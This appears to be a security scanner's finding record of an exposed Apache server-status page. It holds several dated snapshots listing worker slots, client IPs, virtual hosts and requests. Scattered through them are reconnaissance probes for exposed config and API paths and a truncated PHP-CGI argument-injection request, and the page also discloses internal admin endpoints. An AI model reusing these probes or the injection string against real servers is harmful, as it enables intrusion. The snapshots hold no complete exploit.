142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3682552750/105/46632_ 12.240449209327870.03.641399.35 20.64.104.31http/1.1 1-3682552750/108/45927_ 12.3220245425850.04.261399.82 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-3682552750/110/46343_ 12.3230194694250.03.431404.86 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-3682552750/120/44717_ 12.2441322290460.03.761262.78 172.71.156.171h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3682552750/114/46045_ 12.3210449128450.03.451352.86 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3682552740/6/42312_ 6.39980206158220.01.341300.29 104.23.248.140h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3682552740/5/41352_ 6.41980352004290.01.121221.21 172.68.12.58h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3682552740/6/41992_ 6.41984269083600.01.301321.69 104.23.248.13h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3682552740/5/41286_ 6.39980200213220.00.131259.91 108.162.212.40h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3682552740/6/41524_ 6.42980167773490.00.071431.71 172.68.7.171h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3682552740/8/41934_ 6.42980193174770.00.071236.71 172.70.54.72h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3682552740/5/41505_ 6.39980185520720.00.061268.42 172.68.7.118h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3682552740/10/41752_ 6.41985194925750.01.021287.96 104.23.248.5h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3682552740/5/41801_ 6.39980200289830.00.091454.25 172.68.7.39h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3682552740/8/41893_ 6.39981227179060.00.181334.21 172.68.7.166h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/6/46284_ 5.98985272769860.00.071484.33 104.23.248.74h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/5/45080_ 5.9696819234566140.00.081300.01 162.159.104.89h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/3/46279_ 3.02982268170390.00.051455.77 162.158.120.144h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/2/45470_ 5.8498436291609590.00.021523.18 104.23.248.81h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/3/45384_ 5.98975211982910.00.001353.43 172.70.54.110h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/6/45441_ 5.98960206448360.00.051467.57 172.70.83.78h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/4/45936_ 5.98974248547730.00.131502.21 172.70.83.85h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/4/45887_ 5.98980324986030.00.031467.56 172.68.12.210h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/4/45354_ 5.98980864331670.00.021432.98 172.68.7.55h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3682552760/6/46267_ 5.8796440350125250.00.231436.75 162.158.217.28h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3682552770/7/41196_ 6.4898454350725960.00.091320.81 172.68.218.148h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3682552770/7/41128_ 6.55970221084300.00.621357.18 104.23.248.13h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3682552770/8/41313_ 6.56980193733260.01.131404.87 172.70.54.245h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3682552770/6/41713_ 6.55970215130020.00.071270.00 172.70.255.122h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3682552770/11/41146_ 6.55970230145290.00.211239.48 172.70.83.153h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3682552770/15/41162_ 6.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858026eb79d73
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 17-Nov-2025 22:52:36 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 359 Parent Server MPM Generation: 358 Server uptime: 66 days 10 hours 31 minutes 34 seconds Server load: 0.01 0.19 0.15 Total accesses: 2077099 - Total Traffic: 64.7 GB - Total Duration: 1262332710 CPU Usage: u166.82 s213.78 cu11443.2 cs6480.7 - .319% CPU load .362 requests/sec - 11.8 kB/second - 32.7 kB/request - 607.738 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 030786no1yes19000 130787no1yes010000 230788no0yes010000 330919no0yes010000 430789no0yes010000 Sum502 149000 ________W_________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-358307860/56/38403_ 7.7900294130760.00.451435.17 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-358307860/43/37699_ 7.7900444832870.01.911248.97 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-358307860/46/38144_ 7.7910160829130.01.371270.53 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-358307860/46/38132_ 7.7820179655950.00.921313.91 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 0-358307860/53/38521_ 7.7910166192010.01.071306.51 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 0-358307860/49/38406_ 7.74115175064060.01.521303.47 162.158.123.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-358307860/42/38530_ 7.771441244986040.00.901220.18 172.68.245.11h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-358307860/52/38032_ 7.7610160055830.00.661278.34 162.158.42.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-358307860/42/38410W 7.7900171162110.00.611211.84 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-358307860/41/38287_ 7.7910202787840.00.481373.02 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-358307870/29/44058_ 7.540462192263430.012.371415.25 172.68.245.10h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-358307870/29/44678_ 7.5800220508710.01.271424.99 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-358307870/35/44265_ 7.5900231470370.00.401387.74 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-358307870/37/44118_ 7.560317678127390.02.161345.14 104.23.209.90h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-358307870/39/44849_ 7.5900187706500.00.611412.40 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-358307870/28/45352_ 7.2100199612500.01.391361.75 172.70.55.52h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-358307870/32/44685_ 7.5900237899830.01.321360.04 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-358307870/36/45104_ 7.390279189921450.024.341355.82 172.71.211.15h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-358307870/34/43401_ 7.41117304019550.00.571225.15 162.158.120.156h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-358307870/35/44749_ 7.5900438003770.01.811306.40 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-358307880/39/41858_ 6.7825850203408170.021.991289.68 172.71.123.146h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-358307880/30/40899_ 6.912309561349770460.00.971210.72 172.71.166.203h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-358307880/34/41554_ 6.8323040267314360.02.621293.97 172.71.130.107h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-358307880/31/40839_ 6.7625790197882930.00.261228.76 172.71.127.135h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-358307880/30/41065_ 6.7625790165575940.00.761422.19 104.23.225.173h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-358307880/35/41493_ 6.8025850190624080.02.381226.44 172.71.119.79h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-358307880/37/41055_ 6.8010183252840.01.971234.95 172.71.131.98h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-358307880/33/41296_ 6.8123040192656280.00.981271.62 141.101.69.146h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-358307880/34/41336_ 7.6110197888500.00.761442.18 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-358307880/37/41405_ 6.8325840224522180.00.381313.23 172.71.127.24h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-358309190/177/45189_ 14.6400264432070.011.721421.98 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-358309190/186/43862_ 13.8224226384460.06.101265.51 172.71.127.111h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-358309190/208/44988_ 13.816600261003570.05.701419.82 172.71.126.218h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-358309190/191/44302_ 13.806652281879230.04.001481.83 141.101.97.61h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-358309190/183/44248_ 14.6420205174020.05.421317.44 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 3-358309190/180/44208_ 13.9620120200203230.013.001431.25 141.101.97.3h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-358309190/183/44688_ 14.446650237325330.09.881476.40 104.23.213.185h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-358309190/177/44670_ 14.036601316412720.05.071418.68 108.162.245.101h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-358309190/167/43957_ 13.8110855897540.06.561389.89 104.23.225.20h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-358309190/181/45142_ 14.6410341726010.05.351396.44 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 4-358307890/97/39113_ 10.356391338068040.01.961245.65 104.23.225.100h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-358307890/100/39124_ 11.2300207834210.02.441304.86 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-358307890/115/39258_ 10.396340181419280.04.761330.73 141.101.95.92h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-358307890/118/39573_ 10.4917920196782260.04.841202.36 141.101.97.44h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-358307890/102/39015_ 10.4217920219307410.02.681186.43 172.71.130.173h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rs
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858027bee799c
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 15-Nov-2025 22:13:21 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 350 Parent Server MPM Generation: 349 Server uptime: 64 days 9 hours 52 minutes 18 seconds Server load: 0.03 0.07 0.06 Total accesses: 2025154 - Total Traffic: 63.1 GB - Total Duration: 1166292481 CPU Usage: u142.13 s192.49 cu11127 cs6295.79 - .319% CPU load .364 requests/sec - 11.9 kB/second - 32.7 kB/request - 575.903 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04047652no0yes010000 14047787no0yes010000 24047654no0yes19000 34047653no0yes010000 44047655no1yes010000 Sum501 149000 __________________________W_______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-34940476520/2/37585_ 1.461200325290459650.00.281393.79 35.93.76.217http/1.1cinre-viewer.tandemhse.com:443GET /admin/info.php HTTP/1.1 0-34940476520/1/36908_ 1.6612000441558330.00.001232.16 172.68.22.174h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34940476520/2/37283_ 1.6512050157658310.00.001244.89 172.68.22.60h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34940476520/4/37318_ 1.6611990176264800.00.541297.75 172.68.23.35h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34940476520/5/37599_ 1.6612000163064100.00.521286.30 172.68.22.79h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34940476520/6/37603_ 1.6611991171932360.00.791269.89 172.68.23.89h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34940476520/0/37667_ 0.0012000241634470.00.001184.30 35.93.76.217http/1.1 0-34940476520/5/37211_ 1.6611991156366700.00.521260.89 172.68.23.66h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34940476520/2/37495_ 1.6612000167389940.00.261193.44 172.68.23.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34940476520/3/37351_ 1.6612002195844900.00.281314.73 172.68.23.38h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34940477870/48/43308_ 4.140490188244180.03.131390.13 172.69.39.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34940477870/46/43971_ 4.150385217154930.02.851411.31 172.71.124.94h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34940477870/44/43558_ 4.2000228038280.03.441373.96 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-34940477870/45/43384_ 4.2010202203330.02.211329.50 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-34940477870/45/44118_ 4.2000182359570.02.611398.07 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-34940477870/44/44634_ 4.1910195403650.02.391326.00 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 1-34940477870/51/43944_ 4.2010234658050.02.761341.73 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-34940477870/53/44398_ 4.2010186201710.01.831317.20 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-34940477870/42/42644_ 4.2000300479400.01.851207.91 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-34940477870/47/44050_ 4.1910434591310.02.221291.87 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 2-34940476540/7/41171_ 1.35794378199683870.01.031251.84 35.93.76.217http/1.1cinre-viewer.tandemhse.com:443GET /scripts/phpinfo.php.save HTTP/1.1 2-34940476540/1/40230_ 1.507950242523550.00.001188.13 172.68.22.43h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34940476540/4/40953_ 1.507952264339970.00.521278.69 172.68.22.204h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34940476540/5/40149_ 1.5211941192506060.00.561216.12 172.68.23.196h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34940476540/3/40470_ 1.638001162620540.00.531404.24 108.162.237.159h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34940476540/5/40788_ 1.361194191187254820.00.771201.93 104.23.175.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34940476540/3/40399W 1.5200179816220.00.521221.94 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-34940476540/3/40626_ 1.507951189095560.00.311256.75 172.68.22.167h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34940476540/1/40727_ 1.34800329194659730.00.261419.59 35.93.76.217http/1.1cinre-viewer.tandemhse.com:443GET /tmp/info.php HTTP/1.1 2-34940476540/3/40749_ 1.638000220942290.00.561275.22 104.23.245.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34940476530/3/43634_ 1.40794347254172110.00.261379.65 35.93.76.217http/1.1 3-34940476530/4/42295_ 1.50794318206523670.00.771230.23 35.93.76.217http/1.1cinre-viewer.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34940476530/6/43374_ 1.9966318224451370.00.521367.97 172.69.39.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34940476530/6/42718_ 1.77600265607340.00.521435.61 104.23.245.43h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34940476530/6/42645_ 1.48794341194126530.01.031282.58 35.93.76.217http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34940476530/5/42712_ 1.667940192698700.00.781339.00 172.68.22.150h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34940476530/6/43110_ 1.5061321228270450.01.291424.28 35.93.76.217http/1.1cinre-viewer.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34940476530/3/43145_ 1.89367918305030740.00.261361.30 162.158.244.145h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34940476530/4/42379_ 1.663620840704000.00.271328.66 172.69.7.96h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34940476530/5/43599_ 1.653620333873030.00.781365.14 172.68.23.174h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-34940476550/36/37630_ 3.5300329632650.02.211209.81 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-34940476550/37/37712_ 3.451349198417790.01.621265.25 104.23.175.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-34940476550/37/37896_ 3.5200171895350.02.081288.77 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-34940476550/33/38207_ 3.01225176641630.01.841157.24 172.68.134.235h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-34940476550/33/37636_ 3.5220183021890.02.101153.73 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858023d658c0f
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 13-Nov-2025 22:40:21 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 340 Parent Server MPM Generation: 339 Server uptime: 62 days 10 hours 19 minutes 18 seconds Server load: 0.24 0.23 0.21 Total accesses: 1972065 - Total Traffic: 61.6 GB - Total Duration: 1132432907 CPU Usage: u164.54 s204.63 cu10779.4 cs6087.54 - .32% CPU load .366 requests/sec - 12.0 kB/second - 32.8 kB/request - 574.237 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03804714no0yes010000 13804715no0yes010000 23804891no1yes19000 33804862no1yes010000 43804831no0yes010000 Sum502 149000 ____________________________W_____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33938047140/16/36466_ 7.3365324284273580.00.821372.57 104.22.7.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33938047140/16/35881_ 7.5740436390170.00.481215.32 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-33938047140/8/36217_ 7.2385323152169560.00.301223.30 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/change-selected HTTP/1.1 0-33938047140/12/36205_ 7.256481160169547160.00.371261.37 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 0-33938047140/17/36444_ 7.2683910158108480.00.271249.63 136.226.214.119http/1.1relehse.com:443GET /admin/requirements/150465/showNoticeEvaluateds?draw=1&colu 0-33938047140/12/36528_ 7.256481765166399700.01.481251.06 136.226.214.119http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33938047140/12/36650_ 7.2541240235254280.00.501170.50 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 0-33938047140/13/36073_ 7.238342617151157170.00.441230.23 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/tree HTTP/1.1 0-33938047140/9/36479_ 7.17853184161453640.00.531179.43 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 0-33938047140/14/36223_ 7.258342144189484340.01.621293.95 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 1-33938047150/8/42500_ 6.9393220179998220.00.201374.04 136.226.214.119http/1.1relehse.com:443POST /admin/documents/list-document HTTP/1.1 1-33938047150/10/43219_ 6.1292725213251510.06.861374.98 172.68.135.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33938047150/9/42774_ 6.87862223207782940.00.381333.99 172.68.22.79h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33938047150/8/42629_ 6.9587220199735690.00.131312.99 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/change-selected HTTP/1.1 1-33938047150/11/43340_ 6.958671600179341460.00.731384.15 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/tree HTTP/1.1 1-33938047150/5/43876_ 6.9587217188285280.00.941301.61 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/change-selected HTTP/1.1 1-33938047150/9/43154_ 6.419271341227783140.00.291323.05 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/tree HTTP/1.1 1-33938047150/8/43609_ 6.958692943181127430.00.071287.61 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 1-33938047150/12/41881_ 6.308620289949830.00.681192.84 162.158.122.56h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33938047150/6/43262_ 6.0910840417560090.00.621262.81 172.68.134.176h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33938048910/259/40265_ 19.4410195955270.018.911211.51 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-33938048910/253/39228_ 19.4410238900960.016.871159.12 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-33938048910/260/39962_ 19.4400260568900.09.161240.20 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-33938048910/253/39199_ 19.392420186855710.012.601197.83 172.70.175.107h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33938048910/266/39456_ 19.4420159084060.010.531367.68 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-33938048910/237/39749_ 19.4420182923610.09.681180.06 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-33938048910/240/39524_ 19.36021176235250.010.361191.57 104.22.7.54h2lcftech.es:443done, streams: 0/3/3/0/2 (open/recv/resp/push/rst) 2-33938048910/243/39631_ 19.4220184984730.036.291222.26 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 2-33938048910/255/39833W 19.4300190486780.017.721359.10 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-33938048910/263/39739_ 19.4410217273820.027.921243.74 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-33938048620/202/41829_ 16.1930243211310.022.881345.56 162.159.106.130h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33938048620/198/40450_ 16.182184195285540.04.061183.68 172.68.234.214h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-33938048620/209/41538_ 16.2500213174230.012.441333.78 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-33938048620/200/40854_ 16.180274256200460.04.081364.22 172.68.234.214h2lcftech.es:443done, streams: 0/1/1/0/1 (open/recv/resp/push/rst) 3-33938048620/183/40835_ 16.2430179996630.09.661248.28 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-33938048620/182/40906_ 16.2430182992430.06.491276.40 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-33938048620/215/41293_ 16.184322207791970.05.461381.12 162.158.23.147h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33938048620/192/41331_ 16.22318285505480.04.671324.63 162.158.123.2h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33938048620/224/40565_ 16.2420831868130.010.521294.65 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-33938048620/199/41792_ 16.2400325174530.04.981324.49 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-33938048310/12/37017_ 6.75864701326813250.00.351192.65 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 4-33938048310/14/37080_ 7.298711210195467670.00.101243.00 